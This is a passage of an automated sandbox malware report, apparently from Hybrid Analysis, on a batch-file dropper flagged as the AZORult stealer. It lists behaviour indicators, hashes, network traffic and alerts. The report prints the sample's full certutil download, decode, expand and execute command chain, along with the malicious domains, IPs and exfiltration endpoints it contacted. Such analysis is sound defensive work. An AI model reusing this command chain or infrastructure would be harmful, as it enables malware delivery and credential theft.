- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads information about supported languages
- details
-
"certutil.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"expand.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
-
Hiding 1 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 26
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from ercg345c24.exe (PID: 3852) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from ercg345c24.exe (PID: 3852) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from ercg345c24.exe (PID: 3852) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from ercg345c24.exe (PID: 3852) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from sort.exe (PID: 2260) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from sort.exe (PID: 2260) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from sort.exe (PID: 2260) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from sort.exe (PID: 2260) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.dll (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.dll (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
-
GetSystemTimeAsFileTime@KERNEL32.DLL from ercg345c24.exe (PID: 3852) (Show Stream)
GetSystemTimeAsFileTime@KERNEL32.DLL from sort.exe (PID: 2260) (Show Stream)
GetLocalTime@api-ms-win-core-sysinfo-l1-1-0.dll (Show Stream)
GetLocalTime@api-ms-win-core-sysinfo-l1-1-0.dll (Show Stream)
GetLocalTime@api-ms-win-core-sysinfo-l1-1-0.dll (Show Stream)
GetLocalTime@api-ms-win-core-sysinfo-l1-1-0.dll (Show Stream)
GetLocalTime@api-ms-win-core-sysinfo-l1-1-0.dll (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
- ATT&CK ID
- T1124 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to query the machine timezone
- details
-
GetTimeZoneInformation@api-ms-win-core-timezone-l1-1-0.dll (Show Stream)
GetTimeZoneInformation@api-ms-win-core-timezone-l1-1-0.dll (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
- ATT&CK ID
- T1124 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to query volume size
- details
- GetDiskFreeSpaceW@api-ms-win-core-file-l1-1-0.dll (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 3/10
- ATT&CK ID
- T1083 (Show technique in the MITRE ATT&CK™ matrix)
-
Possibly tries to detect the presence of a debugger
- details
-
GetProcessHeap@KERNEL32.DLL from ercg345c24.exe (PID: 3852) (Show Stream)
GetProcessHeap@KERNEL32.DLL from sort.exe (PID: 2260) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query machine time
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)" (SID: 2015744, Rev: 4, Severity: 3) categorized as "Misc activity"
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Contacts domains
- details
-
"www.illumania.net"
"login.giocherialaragnatela.it"
"www.webproj.com.br" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"70.40.203.216:80"
"93.170.105.132:80"
"177.185.194.174:80" - source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
-
"api-ms-win-core-memory-l1-1-0.pdb"
"api-ms-win-crt-utility-l1-1-0.pdb"
"api-ms-win-crt-process-l1-1-0.pdb"
"api-ms-win-core-datetime-l1-1-0.pdb"
"api-ms-win-crt-stdio-l1-1-0.pdb"
"api-ms-win-core-synch-l1-2-0.pdb"
"api-ms-win-crt-heap-l1-1-0.pdb" - source
- File/Memory
- relevance
- 1/10
-
Creates a writable file in a temporary directory
- details
-
"certutil.exe" created file "%TEMP%\ercg345c24.txt"
"certutil.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\ercg345c24.cab"
"expand.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\$dpx$.tmp\218f98763775034fb6c9e84dafefab70.tmp"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-console-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-datetime-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-debug-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-errorhandling-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-file-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-file-l1-2-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-file-l2-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-handle-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-heap-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-interlocked-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-libraryloader-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-localization-l1-2-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-memory-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-namedpipe-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-processenvironment-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-processthreads-l1-1-0.dll"
"ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-processthreads-l1-1-1.dll" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"Local\ZonesLockedCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\WdsSetupLogInit"
"\Sessions\1\BaseNamedObjects\Global\SetupLog"
"Global\WdsSetupLogInit"
"Global\SetupLog"
"\Sessions\1\BaseNamedObjects\A4vds98f74sdvc89svwd"
"A4vds98f74sdvc89svwd" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "api-ms-win-crt-utility-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-util-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-crt-environment-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-file-l1-2-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-libraryloader-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-crt-stdio-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-crt-multibyte-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-processthreads-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-processenvironment-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "msvcp140.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-processthreads-l1-1-1.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-debug-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-file-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "freebl3.dll" as clean (type is "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-crt-convert-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-timezone-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-synch-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-sysinfo-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-crt-time-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows"), Antivirus vendors marked dropped file "api-ms-win-core-handle-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
- source
- Binary File
- relevance
- 10/10
-
Process launched with changed environment
- details
-
Process "certutil.exe" (Show Process) was launched with new environment variables: "fbbvwqvhor="j", fpudnqibnn="c", dbgbhthiwe="n", nbdatjlxaa="s", rpmxpeaqkv="a", bclhrvsier="r", llcyalatin="k", hbwpmojhge="f", oxiplhifxh="e", wjdubatqvb="w", fzcnzqdich="u", ttpkycaxri="m", ispgaooask="d", qgktngrldo="s", lncgxlstvy="p", dnntqtunxj="e", dszrusmbik="l", rovaofbyaa="o", ycqnbxejme="v", psrlwgeret="t", ztjdpwjdxk="t", karjcmygzr="b", wcvtlzqjtr="z", vwtxgbzdzu="y", pnsucgurfy="h", fijxmryoqb="g", dvzarsebuu="i", gomsrppuky="x", pbldtghmet="q""
Process "cmd.exe" (Show Process) was launched with modified environment variables: "Path" - source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "/c timeout 4 & del "ercg345c24.exe"" on 2018-7-12.16:58:44.765
- source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "certutil.exe" with commandline "certutil -urlcache -split -f http://www.illumania.net/login.php ..." (Show Process)
Spawned process "certutil.exe" with commandline "certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab" (Show Process)
Spawned process "expand.exe" with commandline "expand %TEMP%\ercg345c24.cab %TEMP%\ercg345c24.exe" (Show Process)
Spawned process "ercg345c24.exe" (Show Process)
Spawned process "sort.exe" (Show Process)
Spawned process "cmd.exe" with commandline "/c timeout 4 & del "ercg345c24.exe"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "certutil.exe" with commandline "certutil -urlcache -split -f http://www.illumania.net/login.php ..." (Show Process)
Spawned process "certutil.exe" with commandline "certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab" (Show Process)
Spawned process "expand.exe" with commandline "expand %TEMP%\ercg345c24.cab %TEMP%\ercg345c24.exe" (Show Process)
Spawned process "ercg345c24.exe" (Show Process)
Spawned process "sort.exe" (Show Process)
Spawned process "cmd.exe" with commandline "/c timeout 4 & del "ercg345c24.exe"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Connects to LPC ports
- details
-
"certutil.exe" connecting to "\ThemeApiPort"
"ercg345c24.exe" connecting to "\ThemeApiPort" - source
- API Call
- relevance
- 1/10
-
Creates new processes
- details
-
"cmd.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\certutil.exe", Handle: 128)
"cmd.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\certutil.exe", Handle: 120)
"cmd.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\expand.exe", Handle: 120)
"cmd.exe" is creating a new process (Name: "%TEMP%\ercg345c24.exe", Handle: 124) - source
- API Call
- relevance
- 8/10
-
Dropped files
- details
-
"api-ms-win-core-synch-l1-2-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-datetime-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"sort.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"api-ms-win-core-memory-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"vcruntime140.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"ucrtbase.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-heap-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-process-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"nss3.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"api-ms-win-crt-conio-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"mozglue.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"api-ms-win-crt-math-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-utility-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-util-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-environment-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-file-l1-2-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-libraryloader-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-stdio-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-multibyte-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-processthreads-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "cmd.exe" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"certutil.exe" touched file "C:\Windows\SysWOW64\en-US\certutil.exe.mui"
"certutil.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"certutil.exe" touched file "C:\Windows\cerB423.tmp"
"certutil.exe" touched file "C:\Windows\SysWOW64\en-US\KernelBase.dll.mui"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\counters.dat"
"certutil.exe" touched file "C:\Windows\SysWOW64\rsaenh.dll"
"certutil.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files"
"certutil.exe" touched file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies"
"certutil.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\History"
"certutil.exe" touched file "C:\Windows\SysWOW64\wshqos.dll"
"certutil.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CP53U0VR\login[1].htm"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\CP53U0VR\login[1].htm"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\counters.dat"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files"
"certutil.exe" touched file "%APPDATA%\Microsoft\Windows\Cookies"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\History" - source
- API Call
- relevance
- 7/10
-
Connects to LPC ports
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://192.168.56.153:2869/upnphost/udhisapi.dll?content=uuid:4f8e1a2d-3fec-4a15-86de-6f8fafe83a56"
Pattern match: "http://[fe80::dcb9:98e8:7541:f508]:2869/upnphost/udhisapi.dll?content=uuid:4f8e1a2d-3fec-4a15-86de-6f8fafe83a56"
Pattern match: "www.illumania.net"
Pattern match: "www.livingsocial.com"
Pattern match: "www.360.cn"
Pattern match: "https://www.888.es/"
Pattern match: "www.vagalume.com.br"
Pattern match: "www.maxonclick.com"
Pattern match: "www.t-mobile.com"
Pattern match: "www.duowan.com"
Pattern match: "www.sanspo.com"
Pattern match: "www.11st.co.kr"
Pattern match: "www.bing.com"
Pattern match: "www.americanairlines.es"
Pattern match: "www.toshiba.com"
Pattern match: "www.staples.com"
Pattern match: "www.toysrus.com"
Pattern match: "www.oracle.com"
Pattern match: "www.babycenter.com"
Pattern match: "www.monografias.com"
Pattern match: "www.aipai.com"
Pattern match: "www.shoplocal.com"
Pattern match: "www.sogou.com"
Pattern match: "www.reuters.com"
Pattern match: "www.amazon.fr"
Pattern match: "www.entitytag.co.uk"
Pattern match: "www.usafis.org"
Pattern match: "www.pchome.com.tw"
Pattern match: "https://elpais.com/"
Pattern match: "www.amazon.co.jp"
Pattern match: "www.aljazeera.net"
Pattern match: "www.iciba.com"
Pattern match: "www.bahn.de"
Pattern match: "www.hao123.com"
Pattern match: "www.uuu9.com"
Pattern match: "www.justanswer.com&dp=%2F"
Pattern match: "www.sheego.de"
Pattern match: "www.naver.com"
Pattern match: "www.google.com"
Pattern match: "www.zhenai.com"
Pattern match: "www2.esmas.com"
Pattern match: "www.aol.com"
Pattern match: "www.wetter.com"
Pattern match: "www.aa.com"
Pattern match: "www.docin.com"
Pattern match: "www.sprint.com"
Pattern match: "www.ilmeteo.it"
Pattern match: "www.bedbathandbeyond.com"
Pattern match: "www.17173.com"
Pattern match: "www.3366.com"
Pattern match: "www.china.com.cn"
Pattern match: "www.vesti.ru"
Pattern match: "www.speedtest.net"
Pattern match: "www.ustream.tv"
Pattern match: "http://abcnews.go.com/Entertainment/mario-batali-takes-leave-absence-apologizes-mistreated-hurt/story?id=51718005']]},lift_exp:m"
Pattern match: "www.interpark.com"
Pattern match: "www.nate.com"
Pattern match: "www.indeed.com"
Pattern match: "www.manta.com/"
Pattern match: "www.gamespot.com"
Pattern match: "www.gutefrage.net"
Pattern match: "www.jiayuan.com"
Pattern match: "www.lowes.com"
Pattern match: "www.buenastareas.com"
Pattern match: "www.directv.com"
Pattern match: "www.amazon.co.uk"
Pattern match: "people.com/%22%2C%22sref%22:%22%22%2C%22sts%22:1512497753204%2C%22slts%22:0"
Pattern match: "www.3suisses.fr/__referrerSent%3Dtrue"
Pattern match: "www.fullstory.com`lFE`4577660737683456:5629499534213120"
Pattern match: "www.01net.com"
Pattern match: "www.robtex.com"
Pattern match: "www.theweathernetwork.com"
Pattern match: "www.fixya.com"
Pattern match: "www.realtor.com"
Pattern match: "www.qunar.com"
Pattern match: "www.wunderground.com"
Pattern match: "www.etsy.com"
Pattern match: "www.newgrounds.com"
Pattern match: "www.walmart.com"
Pattern match: "www.huffingtonpost.es"
Pattern match: "www.wireshark.org"
Pattern match: "www.olx.com.br"
Pattern match: "www.viamichelin.fr"
Pattern match: "www.mynet.com"
Pattern match: "www.bankrate.com"
Pattern match: "www.elmundo.es"
Pattern match: "www.stumbleupon.com"
Pattern match: "www.cyworld.com"
Pattern match: "www.dotdash.com"
Pattern match: "www.cartoonnetwork.es"
Pattern match: "www.yahoo.com"
Pattern match: "www.ancestry.com"
Pattern match: "www.aweber.com"
Pattern match: "www.52vali.com"
Pattern match: "www.zergnet.com"
Pattern match: "www.webproj.com.br"
Pattern match: "https://buy.norton.com:443/redirector/seo?callback=jQuery1113009479083981632052_1512497951123&ptype=cartpopover&trf_id=symcom&scsguid=0&COUNTRY=ES&LANGUAGE=es&_=1512497951124"
Heuristic match: "login.giocherialaragnatela.it"
Pattern match: "http://www.illumania.net/login.php" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Creates or modifies windows services
- details
-
"certutil.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
"ercg345c24.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
-
"certutil.exe" opened "\Device\KsecDD"
"expand.exe" opened "\Device\KsecDD"
"ercg345c24.exe" opened "\Device\KsecDD" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Drops cabinet archive files
- details
- "ercg345c24.cab" has type "Microsoft Cabinet archive data 138377 bytes 1 file"
- source
- Binary File
- relevance
- 10/10
-
Uses certutil from the Windows Certificate Services
- details
-
Process "certutil.exe" (Show Process)
Process "certutil.exe" (Show Process) - source
- Monitored Target
- relevance
- 10/10
- ATT&CK ID
- T1140 (Show technique in the MITRE ATT&CK™ matrix)
-
Drops cabinet archive files
File Details
VT6784985745.bat
- Filename
- VT6784985745.bat
- Size
- 47KiB (48517 bytes)
- Type
- script bat
- Description
- ASCII text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- 5f6041fcc62f89d8eae2c445e3f5f8ed9240a5c67ab572ceabcd38dd82a1fc20
- MD5
- ca534f372c4a9955ef9033a3dbde4e6a
- SHA1
- e9a69f785538793a11a7d17526a256ebe4e9fd03
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 7 processes in total.
-
cmd.exe
%WINDIR%\system32\cmd.exe /c ""C:\VT6784985745.bat" "
(PID: 1064)
- certutil.exe certutil -urlcache -split -f http://www.illumania.net/login.php %TEMP%\ercg345c24.txt (PID: 3948)
- certutil.exe certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab (PID: 3128)
- expand.exe expand %TEMP%\ercg345c24.cab %TEMP%\ercg345c24.exe (PID: 2512)
- ercg345c24.exe (PID: 3852)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
www.webproj.com.br
OSINT |
177.185.194.174
TTL: 3599 |
- | Brazil |
www.illumania.net
OSINT |
70.40.203.216
TTL: 14399 |
FastDomain Inc.
Name Server: NS1.BLUEHOST.COM Creation Date: Mon, 23 Nov 2009 23:54:21 GMT |
United States |
login.giocherialaragnatela.it
OSINT |
93.170.105.132
TTL: 899 |
- | Czech Republic |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
70.40.203.216 |
80
TCP |
certutil.exe PID: 3948 |
United States |
93.170.105.132 |
80
TCP |
ercg345c24.exe PID: 3852 |
Czech Republic |
177.185.194.174 |
80
TCP |
ercg345c24.exe PID: 3852 |
Brazil |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
70.40.203.216:80 (www.illumania.net) | GET | www.illumania.net/login.php | GET /login.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.illumania.net 200 OK More Details |
70.40.203.216:80 (www.illumania.net) | GET | www.illumania.net/login.php | GET /login.php HTTP/1.1
Accept: */*
User-Agent: CertUtil URL Agent
Host: www.illumania.net
Cache-Control: no-cache 200 OK More Details |
93.170.105.132:80 (login.giocherialaragnatela.it) | POST | login.giocherialaragnatela.it/azs/index.php | POST /azs/index.php HTTP/1.0
Host: login.giocherialaragnatela.it
Connection: close
Content-Length: 113
Accept-Language: en-US
Content-Type: application/octet-stream 200 OK More Details |
93.170.105.132:80 (login.giocherialaragnatela.it) | POST | login.giocherialaragnatela.it/azs/index.php | POST /azs/index.php HTTP/1.0
Host: login.giocherialaragnatela.it
Connection: close
Content-Length: 972929
Accept-Language: en-US
Content-Type: application/octet-stream 200 OK More Details |
177.185.194.174:80 (www.webproj.com.br) | GET | www.webproj.com.br/s/sort.exe | GET /s/sort.exe HTTP/1.0
Host: www.webproj.com.br
Connection: close
Accept-Language: en-US 200 OK More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 70.40.203.216:80 (TCP) | Potential Corporate Privacy Violation | ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request | 2829988 |
local -> 93.170.105.132:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN AZORult Variant.3 Checkin M1 | 2829890 |
local -> 93.170.105.132:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN AZORult Variant.3 Checkin M2 | 2831079 |
177.185.194.174 -> local:49179 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
177.185.194.174 -> local:49179 (TCP) | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) | 2015744 |
Extracted Strings
Extracted Files
Displaying 55 extracted file(s). The remaining 2 file(s) are available in the full version and XML/JSON reports.
-
Clean 23
-
-
api-ms-win-core-debug-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 88ff191fd8648099592ed28ee6c442a5
- SHA1
- 6a4f818b53606a5602c609ec343974c2103bc9cc
- SHA256
- c310cc91464c9431ab0902a561af947fa5c973925ff70482d3de017ed3f73b7d
-
api-ms-win-core-file-l1-1-0.dll
- Size
- 21KiB (21816 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 94ae25c7a5497ca0be6882a00644ca64
- SHA1
- f7ac28bbc47e46485025a51eeb6c304b70cee215
- SHA256
- 7ea06b7050f9ea2bcc12af34374bdf1173646d4e5ebf66ad690b37f4df5f3d4e
-
api-ms-win-core-handle-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 6db54065b33861967b491dd1c8fd8595
- SHA1
- ed0938bbc0e2a863859aad64606b8fc4c69b810a
- SHA256
- 945cc64ee04b1964c1f9fcdc3124dd83973d332f5cfb696cdf128ca5c4cbd0e5
-
api-ms-win-core-libraryloader-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d0873e21721d04e20b6ffb038accf2f1
- SHA1
- 9e39e505d80d67b347b19a349a1532746c1f7f88
- SHA256
- bb25ccf8694d1fcfce85a7159dcf6985fdb54728d29b021cb3d14242f65909ce
-
api-ms-win-core-processenvironment-l1-1-0.dll
- Size
- 19KiB (19248 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 5f73a814936c8e7e4a2dfd68876143c8
- SHA1
- d960016c4f553e461afb5b06b039a15d2e76135e
- SHA256
- 96898930ffb338da45497be019ae1adcd63c5851141169d3023e53ce4c7a483e
-
api-ms-win-core-processthreads-l1-1-0.dll
- Size
- 19KiB (19392 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- a2d7d7711f9c0e3e065b2929ff342666
- SHA1
- a17b1f36e73b82ef9bfb831058f187535a550eb8
- SHA256
- 9dab884071b1f7d7a167f9bec94ba2bee875e3365603fa29b31de286c6a97a1d
-
api-ms-win-core-profile-l1-1-0.dll
- Size
- 17KiB (17712 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/68
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- fee0926aa1bf00f2bec9da5db7b2de56
